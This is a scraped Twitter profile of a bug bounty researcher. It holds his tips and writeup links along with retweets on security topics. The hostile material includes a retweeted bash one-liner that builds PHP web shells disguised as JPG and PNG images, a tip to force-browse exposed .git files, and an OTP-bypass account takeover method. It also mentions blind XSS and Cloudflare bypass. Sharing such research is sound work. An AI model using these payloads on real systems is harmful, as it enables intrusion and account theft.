Sagar Sajeev (@sagar__sajeev) 's Twitter Profile
Sagar Sajeev

@sagar__sajeev

| 19y/o | Security Researcher | Bug Bounty Hunter |

ID: 1257325849683976200

linkhttps://sagarsajeev.wordpress.com calendar_today04-05-2020 15:07:07

43 Tweet

471 Takipçi

249 Takip Edilen

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

I reported this very interesting Business Logic flaw and thought it would be good to make a small writeup on it. So please do read it and I hope it will be helpful. sagarsajeev.medium.com/business-logic… #bugbounty #bugbountytips #vulnerabilities #cybersecurity #infosec #cybersecuritytips

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

#bugbountytips redacted.com/.git -->403 redacted.com/.git/HEAD -->200 redacted.com/.git/objects -->200 redacted.com/.git/config -->200 Make sure you force browse these endpoints if you've got a forbidden git directory. May result in information disclosures. Happy hunting!

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

Thursday Bounties⚡ Vulnerabilities Reported : - Bypassed Cloudflare and Found Origin IP. - Broken Access Control Tip:- lnkd.in/giP6b4pB This tool may help when dealing with Cloudflare WAF's. #bugbounty #cybersecurity #bugbountytips #redteam #vapt

Thursday Bounties⚡

Vulnerabilities Reported :
- Bypassed Cloudflare and Found Origin IP.
- Broken Access Control

Tip:-
lnkd.in/giP6b4pB
This tool may help when dealing with Cloudflare WAF's.

#bugbounty #cybersecurity #bugbountytips #redteam #vapt
Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

I just published a small writeup about Server Side Template Injection (SSTI) I recently reported. Here's the link to the writeup : sagarsajeev.medium.com/server-side-te… #bugbounty #bugbountytips #bughunting #cybersecurity #cybersecuritytips #infosec

Sumit Jain (@sumit_cfe) 's Twitter Profile Photo

A collection of useful Nmap NSE Scripts ... github.com/emadshanab/Nma… Cc Emad Shanab - أبو عبد الله #security #bugbounty #bountyresources #collection #bugbountytips #infosec #hacking #cybersecurity

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

I found a very interesting case of OTP bypass leading to ATO. 1) Enter an invalid six-digit OTP and forward the request. 2) Intercept the response and there you will find the correct OTP encoded in base64. 3) Decode it for the correct OTP. Impact: Account Takeover #bugbounty

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

Do checkout my new writeup on a File Upload Bypass leading to RCE. sagarsajeev.medium.com/file-upload-by… #bugbounty #cybersecurity #bugbountytips #vulnerabilities #redteam #infosec

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

I reported this vulnerability which allowed the attacker to unsubscribe any user from the Target website’s email notification service. I've also published a writeup on that here: sagarsajeev.medium.com/unsubscribe-an… #bugbounty #bugbountytips #vulnerabilities #cybersecurity #infosec #redteam

Intigriti (@intigriti) 's Twitter Profile Photo

Finding blind XSS is hard, but let's make it a bit easier. Set this in Burp and wait until an admin views your User-Agent in a vulnerable application! 💉 Thanks 1bdool492 🔻 for this great tip! #bugbounty #bugbountytips 👇

Finding blind XSS is hard, but let's make it a bit easier. Set this in Burp and wait until an admin views your User-Agent in a vulnerable application! 💉

Thanks <a href="/abdlah_md/">1bdool492 🔻</a> for this great tip! 

#bugbounty #bugbountytips 👇
Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

I've recently published a number of new bug bounty writeups over at my Medium handle. I forgot to update it here on Twitter. Please check them out and let me know your feedback. sagarsajeev.medium.com #bugbounty #bugbountytip #cybersecurity

Adam Langley (@buildhacksecure) 's Twitter Profile Photo

If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload. echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png #bugbountytip #ctf #hacking

Sagar Sajeev (@sagar__sajeev) 's Twitter Profile Photo

Found this interesting script called LinPEAS which can essentially discover possible paths to escalate privileges on Linux or Unix machines. It can be particularly helpful in pwning CTF challenges. github.com/carlospolop/PE… #infosec #cybersecurity #CheatSheet #security #linux

Sam Curry (@samwcyo) 's Twitter Profile Photo

We recently found a vulnerability affecting Hyundai and Genesis vehicles where we could remotely control the locks, engine, horn, headlights, and trunk of vehicles made after 2012. To explain how it worked and how we found it, we have ꙅɿɘƚɔɘqꙅ as our mock car thief:

We recently found a vulnerability affecting Hyundai and Genesis vehicles where we could remotely control the locks, engine, horn, headlights, and trunk of vehicles made after 2012.

To explain how it worked and how we found it, we have <a href="/_specters_/">ꙅɿɘƚɔɘqꙅ</a> as our mock car thief:
Anugrah SR 📌| #HackLearnDaily (@cyph3r_asr) 's Twitter Profile Photo

Now you don't have a excuse to start Complete a Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on... 👇

Now you don't have a excuse to start

Complete a Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on...

👇
Sundar Pichai (@sundarpichai) 's Twitter Profile Photo

Seeing some qs on what Gemini *is* (beyond the zodiac :). Best way to understand Gemini’s underlying amazing capabilities is to see them in action, take a look ⬇️